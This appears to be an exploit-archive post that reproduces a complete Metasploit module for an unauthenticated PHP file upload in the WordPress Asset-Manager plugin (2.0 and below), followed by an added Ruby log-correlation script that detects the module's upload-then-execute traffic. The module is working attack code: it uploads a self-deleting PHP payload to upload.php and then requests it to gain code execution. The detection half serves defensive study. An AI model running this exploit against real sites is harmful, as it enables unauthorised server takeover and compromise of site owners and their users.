WordPress Asset-Manager PHP File Upload Vulnerability

Posted 2012-12-31 09:22:33
This Metasploit module exploits a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. PHP files can be uploaded: a user can upload a file to a temp directory without authentication, which results in arbitrary code execution.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          # Target 0 runs the PHP payload directly; target 1 lets the PhpEXE mixin
          # write and execute a native Linux x86 payload from the PHP stager.
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    # Random 5-letter name so the dropped file is not predictable; the stager
    # deletes itself (:unlink_self) once it has run.
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart/form-data body; the plugin's upload.php reads the
    # file from the "Filedata" field and keeps the client-supplied filename.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    # Remove the stray CRLF that Rex::MIME emits in front of each part boundary.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # upload.php echoes the stored filename on success; anything else is a failure.
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The file is stored under its original name in the plugin's temp directory,
    # which is web-accessible, so a plain GET triggers the PHP payload.
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
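The module's traffic has a fixed shape: an unauthenticated POST to wp-content/plugins/asset-manager/upload.php, then a GET to the uploaded name under wp-content/uploads/assets/temp/. As an added detection example (not part of the original post or of the Metasploit module), the Ruby below parses a few constructed Apache combined-format log lines (invented traffic using documentation IP ranges) and correlates the two requests per client IP within a time window. It rates a pair high when both requests returned 200, which is exactly the condition the module checks before reporting success. The log format, the 300-second window and the severity labels are assumptions of this example.

```ruby
require 'time'

# Constructed sample access log in Apache "combined" format (not real traffic).
# The two lines from 198.51.100.23 reproduce the request sequence the module sends.
SAMPLE_LOG = <<~LOG
  203.0.113.5 - - [31/Dec/2012:09:20:01 +0000] "GET /wordpress/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
  198.51.100.23 - - [31/Dec/2012:09:22:33 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 87 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
  198.51.100.23 - - [31/Dec/2012:09:22:34 +0000] "GET /wordpress/wp-content/uploads/assets/temp/qzmxa.php HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
  203.0.113.5 - - [31/Dec/2012:09:25:10 +0000] "GET /wordpress/wp-content/uploads/assets/temp/photo.jpg HTTP/1.1" 200 40211 "-" "Mozilla/5.0"
  192.0.2.77 - - [31/Dec/2012:10:01:00 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 403 0 "-" "curl/7.26.0"
LOG

# Combined log format: ip ident user [timestamp] "METHOD path proto" status bytes ...
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) (?<bytes>\S+)/

# Request paths used by the module (assumed to be the same on a real install).
UPLOAD_RE   = %r{/wp-content/plugins/asset-manager/upload\.php\z}
TEMP_PHP_RE = %r{/wp-content/uploads/assets/temp/[^/]+\.php\z}

Entry = Struct.new(:ip, :time, :method, :path, :status)

# Parse log text into Entry structs, skipping lines that do not match the format.
def parse_log(text)
  text.each_line.each_with_object([]) do |line, out|
    m = LOG_RE.match(line) or next
    out << Entry.new(m[:ip],
                     Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
                     m[:method], m[:path], m[:status].to_i)
  end
end

# For every POST to the plugin's upload.php, look for a GET of a .php file in the
# plugin's temp directory from the same client within `window` seconds.
def find_upload_chains(entries, window: 300)
  uploads = entries.select { |e| e.method == 'POST' && e.path =~ UPLOAD_RE }
  uploads.map do |up|
    followups = entries.select do |e|
      e.ip == up.ip && e.method == 'GET' && e.path =~ TEMP_PHP_RE &&
        e.time >= up.time && (e.time - up.time) <= window
    end
    severity =
      if up.status == 200 && followups.any? { |f| f.status == 200 }
        'high'    # upload accepted and the dropped file was fetched with 200
      elsif up.status == 200
        'medium'  # upload accepted, no execution attempt seen yet
      else
        'low'     # upload attempt rejected by the server
      end
    { ip: up.ip, uploaded_at: up.time, upload_status: up.status,
      executed: followups.map(&:path), severity: severity }
  end
end

if __FILE__ == $PROGRAM_NAME
  find_upload_chains(parse_log(SAMPLE_LOG)).each { |f| puts f.inspect }
end
```

The module treats any 200 on the follow-up GET as execution; a server that serves the uploads directory as static files would also answer 200 (returning the PHP source), so a rule like this should be treated as an indicator to triage, not proof of code execution. The rejected POST from 192.0.2.77 is still reported, at low severity, because a scan against the plugin is worth knowing about even when it fails.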